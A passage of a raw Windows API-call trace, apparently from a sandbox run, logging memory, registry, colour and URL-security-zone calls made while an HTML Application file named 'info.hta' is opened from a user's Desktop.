(HeapHandle=0x470000, Flags=0x0, Size=0x70) returned 0x4ab7e0 [0223.346] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xf8) returned 0x4ab858 [0223.346] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8b4) returned 0x4ab958 [0223.346] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e0b0 [0223.347] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.347] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e0c8 [0223.347] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x84) returned 0x4ac218 [0223.434] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x800) returned 0x4ac2a8 [0223.434] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x800) returned 0x4acab0 [0223.434] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4c) returned 0x4ad2b8 [0223.435] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x800) returned 0x4ad310 [0223.435] IsCharSpaceW (wch=0x48) returned 0 [0223.435] IsCharAlphaNumericW (ch=0x5c) returned 0 [0223.435] IsCharSpaceW (wch=0x5c) returned 0 [0223.435] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4934c8 [0223.435] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4adb18 [0223.435] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4934e8 [0223.435] IsCharSpaceW (wch=0x41) returned 0 [0223.435] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x49e0e0 [0223.435] IsCharAlphaNumericW (ch=0x20) returned 0 [0223.435] IsCharSpaceW (wch=0x20) returned 1 [0223.435] IsCharSpaceW (wch=0x7b) returned 0 [0223.435] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4a4708 [0223.435] IsCharSpaceW (wch=0x20) returned 1 [0223.435] IsCharAlphaNumericW (ch=0x7b) returned 0 [0223.435] IsCharSpaceW (wch=0x62) returned 0 [0223.435] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adb18 | out: hHeap=0x470000) returned 1 [0223.435] IsCharAlphaNumericW (ch=0x3a) returned 0 [0223.435] IsCharSpaceW (wch=0x3a) returned 0 [0223.435] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4a4730 [0223.541] IsCharAlphaNumericW (ch=0x3a) returned 0 [0223.541] IsCharSpaceW (wch=0x75) returned 0 [0223.541] IsCharAlphaNumericW (ch=0x28) returned 0 [0223.541] IsCharSpaceW (wch=0x28) returned 0 [0223.541] IsCharAlphaNumericW (ch=0x28) returned 0 [0223.541] IsCharSpaceW (wch=0x23) returned 0 [0223.541] IsCharSpaceW (wch=0x23) returned 0 [0223.541] IsCharSpaceW (wch=0x7d) returned 0 [0223.541] IsCharAlphaNumericW (ch=0x7d) returned 0 [0223.541] IsCharSpaceW (wch=0x29) returned 0 [0223.541] IsCharSpaceW (wch=0x75) returned 0 [0223.541] IsCharSpaceW (wch=0x75) returned 0 [0223.541] IsCharSpaceW (wch=0x29) returned 0 [0223.541] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x493528 [0223.541] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x34) returned 0x4add20 [0223.541] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x484028 [0223.541] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e0f8 [0223.541] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e110 [0223.541] CoTaskMemFree (pv=0x4ab630) [0223.541] CoTaskMemFree (pv=0x49e038) [0223.541] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x493548 [0223.542] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76340000 [0223.542] GetProcAddress (hModule=0x76340000, lpProcName=0x6) returned 0x76343e59 [0223.542] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0223.542] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x340) returned 0x4add60 [0223.542] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4a) returned 0x4ae0c0 [0223.542] IsOS (dwOS=0x25) returned 1 [0223.542] GetSysColor (nIndex=26) returned 0xcc6600 [0223.542] IsOS (dwOS=0x25) returned 1 [0223.542] GetSysColor (nIndex=5) returned 0xffffff [0223.542] GetSysColor (nIndex=8) returned 0x0 [0223.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.542] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e038 [0223.556] wcstol (in: _String="0,0,255", _EndPtr=0x41e684, _Radix=10 | out: _EndPtr=0x41e684*=",0,255") returned 0 [0223.556] wcstol (in: _String="0,255", _EndPtr=0x41e684, _Radix=10 | out: _EndPtr=0x41e684*=",255") returned 0 [0223.556] wcstol (in: _String="255", _EndPtr=0x41e684, _Radix=10 | out: _EndPtr=0x41e684*="") returned 255 [0223.556] wcstol (in: _String="128,0,128", _EndPtr=0x41e684, _Radix=10 | out: _EndPtr=0x41e684*=",0,128") returned 128 [0223.557] wcstol (in: _String="0,128", _EndPtr=0x41e684, _Radix=10 | out: _EndPtr=0x41e684*=",128") returned 0 [0223.557] wcstol (in: _String="128", _EndPtr=0x41e684, _Radix=10 | out: _EndPtr=0x41e684*="") returned 128 [0223.560] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0223.576] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0223.576] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x41f73c | out: phkResult=0x41f73c*=0x17c) returned 0x0 [0223.576] SHGetValueW (in: hkey=0x17c, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x41f740, pcbData=0x41f738*=0xa | out: pdwType=0x0, pvData=0x41f740, pcbData=0x41f738*=0xa) returned 0x2 [0223.577] RegCloseKey (hKey=0x17c) returned 0x0 [0223.578] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x80) returned 0x4b04a8 [0223.578] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49dfd8 [0223.578] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3a) returned 0x4840b8 [0223.578] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6a) returned 0x4b0530 [0223.617] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e008 [0223.617] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x26) returned 0x48d0e0 [0223.617] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6e) returned 0x4b05a8 [0223.617] GetProcessHeap () returned 0x470000 [0223.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ab630 | out: hHeap=0x470000) returned 1 [0223.617] GetProcessHeap () returned 0x470000 [0223.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4af4c0 | out: hHeap=0x470000) returned 1 [0223.617] GetProcessHeap () returned 0x470000 [0223.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49b840 | out: hHeap=0x470000) returned 1 [0223.617] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x493568 [0223.617] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4af0c0 [0223.617] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x493588 [0223.618] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x484100 [0223.619] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x60) returned 0x4ab630 [0223.619] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x24) returned 0x48d110 [0223.619] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4a4780 [0223.619] GetAcceptLanguagesW () returned 0x0 [0223.619] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4849f8 [0223.619] GetClassNameW (in: hWnd=0x20156, lpClassName=0x41fa0c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0223.619] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0223.619] GetParent (hWnd=0x20156) returned 0x2016e [0223.619] GetClassNameW (in: hWnd=0x2016e, lpClassName=0x41fa0c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0223.619] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0223.619] GetParent (hWnd=0x2016e) returned 0x0 [0223.619] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4935a8 [0223.619] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x28) returned 0x48d140 [0223.619] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4935a8 | out: hHeap=0x470000) returned 1 [0223.668] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ae118 [0223.668] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe) returned 0x4af120 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x94) returned 0x4b0620 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4935a8 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x4935c8 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4935e8 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe) returned 0x4af138 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x4af150 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe) returned 0x4af168 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x4af180 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4a47a8 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1a) returned 0x4a47d0 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1a) returned 0x4a47f8 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12) returned 0x493608 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12) returned 0x493628 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12) returned 0x493648 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12) returned 0x493668 [0223.669] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x4af198 [0223.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4af1c8 [0223.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x4af1e0 [0223.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x12) returned 0x493688 [0223.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe) returned 0x4af1f8 [0223.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa) returned 0x4af210 [0223.670] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x26) returned 0x48d170 [0223.670] GetProcessHeap () returned 0x470000 [0223.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a4820 | out: hHeap=0x470000) returned 1 [0223.670] GetProcessHeap () returned 0x470000 [0223.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a4848 | out: hHeap=0x470000) returned 1 [0223.670] GetProcessHeap () returned 0x470000 [0223.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a4870 | out: hHeap=0x470000) returned 1 [0223.670] GetProcessHeap () returned 0x470000 [0223.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x484800 | out: hHeap=0x470000) returned 1 [0223.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4af198 | out: hHeap=0x470000) returned 1 [0223.670] IMoniker:GetDisplayName (in: This=0x4805d8, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x41f9d0 | out: ppszDisplayName=0x41f9d0*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0x0 [0223.670] IUnknown:QueryInterface (in: This=0x4805d8, riid=0x740772f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x41f9a8 | out: ppvObject=0x41f9a8*=0x4805e4) returned 0x0 [0223.670] IUriContainer:GetIUri (in: This=0x4805e4, ppIUri=0x41f9d8 | out: ppIUri=0x41f9d8*=0x49bd1c) returned 0x0 [0223.670] IUnknown:Release (This=0x4805e4) returned 0x1 [0223.670] IUnknown:AddRef (This=0x4805d8) returned 0x2 [0223.670] IUnknown:AddRef (This=0x49bd1c) returned 0x5 [0223.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.671] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.671] IMoniker:GetDisplayName (in: This=0x4805d8, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x41f8b0 | out: ppszDisplayName=0x41f8b0*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0x0 [0223.671] UrlGetLocationW (psz1="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0x0 [0223.671] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppmk=0x41f87c*=0x0, dwFlags=0x1 | out: ppmk=0x41f87c*=0x4af4c0) returned 0x0 [0223.671] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x41f874 | out: ppURI=0x41f874*=0x49c07c) returned 0x0 [0223.671] IUri:GetScheme (in: This=0x49c07c, pdwScheme=0x41f80c | out: pdwScheme=0x41f80c*=0x9) returned 0x0 [0223.671] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0223.672] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1c) returned 0x4a4870 [0223.672] IUnknown:AddRef (This=0x49c07c) returned 0x5 [0223.672] IUri:GetAbsoluteUri (in: This=0x49c07c, pbstrAbsoluteUri=0x4a4870 | out: pbstrAbsoluteUri=0x4a4870*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0x0 [0223.672] IUnknown:Release (This=0x49c07c) returned 0x4 [0223.672] IUnknown:AddRef (This=0x4af4c0) returned 0x2 [0223.672] IUnknown:Release (This=0x4af4c0) returned 0x1 [0223.672] IUnknown:AddRef (This=0x4805d8) returned 0x3 [0223.672] IUnknown:Release (This=0x4af4c0) returned 0x0 [0223.672] IUnknown:AddRef (This=0x4805d8) returned 0x4 [0223.672] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f67c | out: ppvObject=0x41f67c*=0x49bd1c) returned 0x0 [0223.672] IUnknown:Release (This=0x49bd1c) returned 0x5 [0223.672] IUnknown:AddRef (This=0x49bd1c) returned 0x6 [0223.672] IUnknown:QueryInterface (in: This=0x4805d8, riid=0x740772f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x41f650 | out: ppvObject=0x41f650*=0x4805e4) returned 0x0 [0223.672] IUriContainer:GetIUri (in: This=0x4805e4, ppIUri=0x41f6a4 | out: ppIUri=0x41f6a4*=0x49bd1c) returned 0x0 [0223.672] IUnknown:Release (This=0x4805e4) returned 0x4 [0223.672] IUnknown:AddRef (This=0x4805d8) returned 0x5 [0223.672] IUnknown:Release (This=0x4805d8) returned 0x4 [0223.672] IUnknown:AddRef (This=0x49bd1c) returned 0x8 [0223.672] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f67c | out: ppvObject=0x41f67c*=0x49bd1c) returned 0x0 [0223.672] IUnknown:Release (This=0x49bd1c) returned 0x8 [0223.672] IUnknown:AddRef (This=0x49bd1c) returned 0x9 [0223.672] IUri:GetScheme (in: This=0x49bd1c, pdwScheme=0x41f674 | out: pdwScheme=0x41f674*=0x9) returned 0x0 [0223.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xc8) returned 0x4b0840 [0223.672] GetCurrentProcessId () returned 0x380 [0223.672] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f67c | out: ppvObject=0x41f67c*=0x49bd1c) returned 0x0 [0223.673] IUnknown:Release (This=0x49bd1c) returned 0x9 [0223.673] IUnknown:AddRef (This=0x49bd1c) returned 0xa [0223.673] IUri:GetScheme (in: This=0x49bd1c, pdwScheme=0x41f64c | out: pdwScheme=0x41f64c*=0x9) returned 0x0 [0223.673] IUnknown:QueryInterface (in: This=0x49bd1c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41f600 | out: ppvObject=0x41f600*=0x49bd1c) returned 0x0 [0223.673] IUnknown:Release (This=0x49bd1c) returned 0xa [0223.673] IUnknown:AddRef (This=0x49bd1c) returned 0xb [0223.673] IUnknown:Release (This=0x49bd1c) returned 0xa [0223.673] IUri:GetAbsoluteUri (in: This=0x49bd1c, pbstrAbsoluteUri=0x41f67c | out: pbstrAbsoluteUri=0x41f67c*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0x0 [0223.673] GetProcAddress (hModule=0x76340000, lpProcName=0x7) returned 0x76344680 [0223.673] SysStringLen (param_1="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0x38 [0223.673] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x41f698 | out: ppURI=0x41f698*=0x49c22c) returned 0x0 [0223.673] IUnknown:Release (This=0x49bd1c) returned 0x9 [0223.673] IUri:GetScheme (in: This=0x49c22c, pdwScheme=0x41f62c | out: pdwScheme=0x41f62c*=0x9) returned 0x0 [0223.673] IUri:IsEqual (in: This=0x49c07c, pUri=0x49c22c, pfEqual=0x41f674 | out: pfEqual=0x41f674*=1) returned 0x0 [0223.673] IUnknown:AddRef (This=0x49c07c) returned 0x3 [0223.673] IUri:GetPropertyDWORD (in: This=0x49c07c, uriProp=0x11, pdwProperty=0x41f40c, dwFlags=0x0 | out: pdwProperty=0x41f40c*=0x9) returned 0x0 [0223.673] IUnknown:Release (This=0x49c07c) returned 0x2 [0223.720] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x481de8 [0223.720] IInternetSecurityManager:GetSecurityId (in: This=0x4a38e8, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f470, pcbSecurityId=0x41f46c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f470*=0x66, pcbSecurityId=0x41f46c*=0x9) returned 0x0 [0223.720] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pbSecurityId=0x41f470, pcbSecurityId=0x41f46c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41f470*=0x0, pcbSecurityId=0x41f46c*=0x200) returned 0x800c0011 [0223.731] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x481de8 | out: hHeap=0x470000) returned 1 [0223.731] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49df00 | out: hHeap=0x470000) returned 1 [0223.731] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9) returned 0x49df00 [0223.731] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41f628 | out: ppu=0x41f628) returned 0x0 [0223.731] GetDC (hWnd=0x0) returned 0xffffffffab0101eb [0223.731] CreateCompatibleBitmap (hdc=0xab0101eb, cx=1, cy=1) returned 0x80506b7 [0223.732] GetDIBits (in: hdc=0xab0101eb, hbm=0x80506b7, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x41f1f8, usage=0x0 | out: lpvBits=0x0, lpbmi=0x41f1f8) returned 1 [0223.732] GetDIBits (in: hdc=0xab0101eb, hbm=0x80506b7, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x41f1f8, usage=0x0 | out: lpvBits=0x0, lpbmi=0x41f1f8) returned 1 [0223.732] DeleteObject (ho=0x80506b7) returned 1 [0223.732] GetSysColor (nIndex=0) returned 0xc8c8c8 [0223.732] GetSysColor (nIndex=1) returned 0x0 [0223.732] GetSysColor (nIndex=2) returned 0xd1b499 [0223.732] GetSysColor (nIndex=3) returned 0xdbcdbf [0223.732] GetSysColor (nIndex=4) returned 0xf0f0f0 [0223.732] GetSysColor (nIndex=5) returned 0xffffff [0223.732] GetSysColor (nIndex=6) returned 0x646464 [0223.732] GetSysColor (nIndex=7) returned 0x0 [0223.732] GetSysColor (nIndex=8) returned 0x0 [0223.732] GetSysColor (nIndex=9) returned 0x0 [0223.732] GetSysColor (nIndex=10) returned 0xb4b4b4 [0223.732] GetSysColor (nIndex=11) returned 0xfcf7f4 [0223.732] GetSysColor (nIndex=12) returned 0xababab [0223.732] GetSysColor (nIndex=13) returned 0xff9933 [0223.732] GetSysColor (nIndex=14) returned 0xffffff [0223.732] GetSysColor (nIndex=15) returned 0xf0f0f0 [0223.732] GetSysColor (nIndex=16) returned 0xa0a0a0 [0223.732] GetSysColor (nIndex=17) returned 0x6d6d6d [0223.732] GetSysColor (nIndex=18) returned 0x0 [0223.732] GetSysColor (nIndex=19) returned 0x544e43 [0223.732] GetSysColor (nIndex=20) returned 0xffffff [0223.732] GetSysColor (nIndex=21) returned 0x696969 [0223.732] GetSysColor (nIndex=22) returned 0xe3e3e3 [0223.732] GetSysColor (nIndex=23) returned 0x0 [0223.732] GetSysColor (nIndex=24) returned 0xe1ffff [0223.732] GetSysColor (nIndex=25) returned 0x0 [0223.732] GetSysColor (nIndex=26) returned 0xcc6600 [0223.732] GetSysColor (nIndex=27) returned 0xead1b9 [0223.732] GetSysColor (nIndex=28) returned 0xf2e4d7 [0223.732] GetSysColor (nIndex=29) returned 0xff9933 [0223.732] GetSysColor (nIndex=30) returned 0xf0f0f0 [0223.732] GetSysColor (nIndex=31) returned 0x0 [0223.732] GetSysColor (nIndex=32) returned 0x0 [0223.732] GetSysColor (nIndex=33) returned 0x0 [0223.732] GetSysColor (nIndex=34) returned 0x0 [0223.732] GetSysColor (nIndex=35) returned 0x0 [0223.732] GetSysColor (nIndex=36) returned 0x0 [0223.732] GetSysColor (nIndex=37) returned 0x0 [0223.732] GetSysColor (nIndex=38) returned 0x0 [0223.732] GetSysColor (nIndex=39) returned 0x0 [0223.733] GetSysColor (nIndex=40) returned 0x0 [0223.733] GetSysColor (nIndex=41) returned 0x0 [0223.733] GetSysColor (nIndex=42) returned 0x0 [0223.733] GetSysColor (nIndex=43) returned 0x0 [0223.733] GetSysColor (nIndex=44) returned 0x0 [0223.733] GetSysColor (nIndex=45) returned 0x0 [0223.733] GetSysColor (nIndex=46) returned 0x0 [0223.733] GetSysColor (nIndex=47) returned 0x0 [0223.733] GetSysColor (nIndex=48) returned 0x0 [0223.733] GetSysColor (nIndex=49) returned 0x0 [0223.733] GetSysColor (nIndex=50) returned 0x0 [0223.733] GetSysColor (nIndex=51) returned 0x0 [0223.733] GetSysColor (nIndex=52) returned 0x0 [0223.733] GetSysColor (nIndex=53) returned 0x0 [0223.733] GetSysColor (nIndex=54) returned 0x0 [0223.733] GetSysColor (nIndex=55) returned 0x0 [0223.733] GetSysColor (nIndex=56) returned 0x0 [0223.733] GetSysColor (nIndex=57) returned 0x0 [0223.733] GetSysColor (nIndex=58) returned 0x0 [0223.733] GetSysColor (nIndex=59) returned 0x0 [0223.733] GetSysColor (nIndex=60) returned 0x0 [0223.733] GetSysColor (nIndex=61) returned 0x0 [0223.733] GetSysColor (nIndex=62) returned 0x0 [0223.733] GetSysColor (nIndex=63) returned 0x0 [0223.733] GetDeviceCaps (hdc=0xab0101eb, index=38) returned 32409 [0223.733] ReleaseDC (hWnd=0x0, hDC=0xab0101eb) returned 1 [0223.734] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x50) returned 0x4ae1c8 [0223.734] GetCursorPos (in: lpPoint=0x41f478 | out: lpPoint=0x41f478*(x=751, y=143)) returned 1 [0223.734] GetKeyState (nVirtKey=16) returned 0 [0223.734] GetKeyState (nVirtKey=17) returned 0 [0223.734] GetKeyState (nVirtKey=18) returned 0 [0223.734] GetKeyState (nVirtKey=160) returned 0 [0223.734] GetKeyState (nVirtKey=162) returned 0 [0223.734] GetKeyState (nVirtKey=164) returned 0 [0223.734] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x30) returned 0x48d818 [0223.734] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x28) returned 0x4b0f10 [0223.734] GetProcAddress (hModule=0x76340000, lpProcName=0x8) returned 0x76343ed5 [0223.734] GetCurrentThreadId () returned 0x390 [0223.734] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48d818 | out: hHeap=0x470000) returned 1 [0223.734] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x76) returned 0x481de8 [0223.735] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41f618 | out: ppu=0x41f618) returned 0x0 [0223.735] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x41f5fc | out: ppURI=0x41f5fc*=0x49c07c) returned 0x0 [0223.735] IUnknown:AddRef (This=0x49c07c) returned 0x5 [0223.735] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41f59c, dwFlags=0x0 | out: pdwZone=0x41f59c*=0xffffffff) returned 0x800c0011 [0223.736] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.736] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.736] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0223.736] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwAction=0x2700, pPolicy=0x41f5a0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x41f5a0*=0x0) returned 0x0 [0223.736] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.736] IUnknown:Release (This=0x49c07c) returned 0x4 [0223.736] 